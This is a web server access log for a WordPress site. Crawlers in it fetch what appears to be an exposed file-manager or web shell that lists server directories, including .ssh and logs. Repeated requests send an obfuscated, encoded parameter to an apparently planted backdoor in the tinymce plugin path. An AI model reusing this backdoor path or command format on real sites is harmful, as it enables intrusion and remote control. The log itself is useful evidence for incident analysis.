162.158.202.109 - - [06/Dec/2025:04:34:59 +0100] "GET /?path=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/akismet/views HTTP/1.0" 200 36954 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
104.22.1.32 - - [06/Dec/2025:04:34:59 +0100] "GET /?f=161665458 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.240.209 - - [06/Dec/2025:04:33:09 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353538392p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939313938392q3938616631613963353466643631646332373434383531663137613237313237222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
162.158.202.109 - - [06/Dec/2025:04:35:17 +0100] "GET /?path=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/burst-statistics/helpers HTTP/1.0" 200 23292 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.170.147 - - [06/Dec/2025:04:35:18 +0100] "GET /?f=1295602457 HTTP/1.0" 200 208740 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.158.202.109 - - [06/Dec/2025:04:35:21 +0100] "GET /?path=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/burst-statistics/integrations HTTP/1.0" 200 21945 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
162.159.106.43 - - [06/Dec/2025:04:35:21 +0100] "GET /?f=1323545301 HTTP/1.0" 200 217338 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
162.158.202.109 - - [06/Dec/2025:04:35:25 +0100] "GET /?path=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/burst-statistics/languages HTTP/1.0" 200 20376 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
104.22.1.32 - - [06/Dec/2025:04:35:25 +0100] "GET /?f=2566903227 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.229.55 - - [06/Dec/2025:04:33:30 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353631302p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323031302q6237663639333762636135333036316266623163646466356635313163626261222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
162.158.202.109 - - [06/Dec/2025:04:35:36 +0100] "GET /?path=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/burst-statistics/settings HTTP/1.0" 200 33309 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.170.147 - - [06/Dec/2025:04:35:38 +0100] "GET /?f=592735632 HTTP/1.0" 200 208753 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.172.202 - - [06/Dec/2025:04:33:51 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353633312p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323033312q3364376334346237353263376333316635323935643563313137386232336436222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.69.65.159 - - [06/Dec/2025:04:35:59 +0100] "GET /?f=3900817407 HTTP/1.0" 200 239195 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.164.93 - - [06/Dec/2025:04:34:12 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353635322p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323035322q6130306234323132383530366434326336333731353265646566643532623034222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.69.65.159 - - [06/Dec/2025:04:36:19 +0100] "GET /?f=3918071865 HTTP/1.0" 200 216536 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
108.162.238.43 - - [06/Dec/2025:04:36:32 +0100] "GET /?f=2274804899 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.222.192 - - [06/Dec/2025:04:34:33 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353637332p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323037332q6533323139363565636534363262303134373135626161376262376437326530222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.69.71.183 - - [06/Dec/2025:04:36:35 +0100] "GET /?f=958406378 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.71.183 - - [06/Dec/2025:04:36:36 +0100] "GET /?f=883152853 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.65.159 - - [06/Dec/2025:04:36:40 +0100] "GET /?f=4064378897 HTTP/1.0" 200 214366 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.158.110.38 - - [06/Dec/2025:04:34:54 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353639342p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323039342q3837633335326236343066373633386266306661393031663135343636646234222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.170.146 - - [06/Dec/2025:04:37:00 +0100] "GET /?f=986580321 HTTP/1.0" 200 204953 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.158.110.38 - - [06/Dec/2025:04:35:15 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353731352p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323131352q3065393834666634373335386432663036376363646631643737353638313164222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.69.65.159 - - [06/Dec/2025:04:37:20 +0100] "GET /?f=2673195195 HTTP/1.0" 200 209463 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.23.245.112 - - [06/Dec/2025:04:37:34 +0100] "GET /?f=1253631053 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
162.158.87.90 - - [06/Dec/2025:04:35:36 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353733362p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323133362q3335316138646335613538343664303032313936383261646264393861663764222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.69.65.159 - - [06/Dec/2025:04:37:41 +0100] "GET /?f=1368939559 HTTP/1.0" 200 220847 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.148.157 - - [06/Dec/2025:04:35:57 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353735372p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323135372q6565363861636435353836343131323233336266326561333234666165343539222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.170.146 - - [06/Dec/2025:04:38:01 +0100] "GET /?f=1332645146 HTTP/1.0" 200 195429 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.22.116 - - [06/Dec/2025:04:38:15 +0100] "GET /?f=825545047 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.195.207 - - [06/Dec/2025:04:36:18 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353737382p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323137382q6630376566653933323363353366343038376362363161313064376136663763222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.69.65.159 - - [06/Dec/2025:04:38:22 +0100] "GET /?f=659177184 HTTP/1.0" 200 219886 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.23.245.112 - - [06/Dec/2025:04:38:26 +0100] "GET /?f=3928234910 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.251.209 - - [06/Dec/2025:04:36:39 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353739392p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323139392q3334343434613866383861613130333565393064666536656162396334316434222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.69.65.159 - - [06/Dec/2025:04:38:42 +0100] "GET /?f=1779345302 HTTP/1.0" 200 229912 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.71.183 - - [06/Dec/2025:04:38:54 +0100] "GET /?o=87687473001730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.112 - - [06/Dec/2025:04:38:58 +0100] "GET /?f=3682045817 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.122.233 - - [06/Dec/2025:04:37:00 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353832302p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323232302q3137346535303231666234663462393230343361373935313935326565643233222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.69.65.159 - - [06/Dec/2025:04:39:03 +0100] "GET /?f=300679567 HTTP/1.0" 200 200676 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.22.116 - - [06/Dec/2025:04:39:19 +0100] "GET /?f=2320938205 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.70.196 - - [06/Dec/2025:04:39:19 +0100] "GET /?f=1767999061 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.246.196 - - [06/Dec/2025:04:37:21 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353834312p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323234312q3366336235353964353937333361366661643736313465353135303234653363222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.170.147 - - [06/Dec/2025:04:39:23 +0100] "GET /?f=2912807970 HTTP/1.0" 200 216287 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.7.47 - - [06/Dec/2025:04:39:33 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2F5ed1a6%2Findex.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2F5ed1a6 HTTP/1.0" 200 156957 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.69.7.47 - - [06/Dec/2025:04:39:36 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs HTTP/1.0" 200 41894 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.70.196 - - [06/Dec/2025:04:39:41 +0100] "GET /?f=1022554713 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.172.202 - - [06/Dec/2025:04:37:42 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353836322p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323236322q6331616437653366326332656334653562613232666138383030663030316361222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.69.65.159 - - [06/Dec/2025:04:39:50 +0100] "GET /?f=2841621806 HTTP/1.0" 200 231859 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.22.116 - - [06/Dec/2025:04:39:51 +0100] "GET /?f=2627268828 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.22.1.32 - - [06/Dec/2025:04:39:53 +0100] "GET /?f=2024615825 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.17.107 - - [06/Dec/2025:04:39:54 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fadmin.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com HTTP/1.0" 200 21848 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.69.17.36 - - [06/Dec/2025:04:39:57 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2F5ed1a6%2F5ed1a6 HTTP/1.0" 200 24505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.243.151 - - [06/Dec/2025:04:38:03 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353838332p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323238332q3038373933333338653939336135333136313930306332346134666132353761222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
108.162.238.43 - - [06/Dec/2025:04:40:07 +0100] "GET /?f=1148571251 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.166.40 - - [06/Dec/2025:04:40:10 +0100] "GET /?f=3346840018 HTTP/1.0" 200 217804 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.22.116 - - [06/Dec/2025:04:40:13 +0100] "GET /?f=779280410 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.22.1.32 - - [06/Dec/2025:04:40:17 +0100] "GET /?f=2452761539 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.80.31 - - [06/Dec/2025:04:40:19 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2F.composer HTTP/1.0" 200 20991 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.31 - - [06/Dec/2025:04:40:22 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2F.ssh HTTP/1.0" 200 19484 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.240.209 - - [06/Dec/2025:04:38:24 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353930342p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323330342q3261303734393763666139363334616437346664666466613661323935343632222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.170.147 - - [06/Dec/2025:04:40:29 +0100] "GET /?f=657872726 HTTP/1.0" 200 211301 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.170.147 - - [06/Dec/2025:04:40:31 +0100] "GET /?f=3679002379 HTTP/1.0" 200 234084 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.65.159 - - [06/Dec/2025:04:40:32 +0100] "GET /?f=2130531043 HTTP/1.0" 200 204992 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.65.159 - - [06/Dec/2025:04:40:34 +0100] "GET /?f=1472458756 HTTP/1.0" 200 208970 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.120.51 - - [06/Dec/2025:04:40:35 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2F.trash HTTP/1.0" 200 17875 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.69.65.159 - - [06/Dec/2025:04:40:35 +0100] "GET /?f=2529840527 HTTP/1.0" 200 240580 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.65.159 - - [06/Dec/2025:04:40:37 +0100] "GET /?f=2088419108 HTTP/1.0" 200 215415 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.120.51 - - [06/Dec/2025:04:40:38 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2F.revisium_antivirus_cache HTTP/1.0" 200 17974 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.69.65.159 - - [06/Dec/2025:04:40:38 +0100] "GET /?f=292945595 HTTP/1.0" 200 209702 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.65.159 - - [06/Dec/2025:04:40:40 +0100] "GET /?f=2983213885 HTTP/1.0" 200 209859 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.22.1.90 - - [06/Dec/2025:04:40:41 +0100] "GET /?f=854654337 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.80.31 - - [06/Dec/2025:04:40:41 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2F.pki HTTP/1.0" 200 17845 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.69.65.159 - - [06/Dec/2025:04:40:41 +0100] "GET /?f=2352651879 HTTP/1.0" 200 212399 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.65.159 - - [06/Dec/2025:04:40:42 +0100] "GET /?f=738137822 HTTP/1.0" 200 196056 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.80.31 - - [06/Dec/2025:04:40:44 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Flogs HTTP/1.0" 200 89966 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
104.23.239.80 - - [06/Dec/2025:04:38:45 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353932352p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323332352q6134303532346130326163343133663861656238346635376138653736333139222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.69.65.159 - - [06/Dec/2025:04:40:54 +0100] "GET /?f=3618108407 HTTP/1.0" 200 203499 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
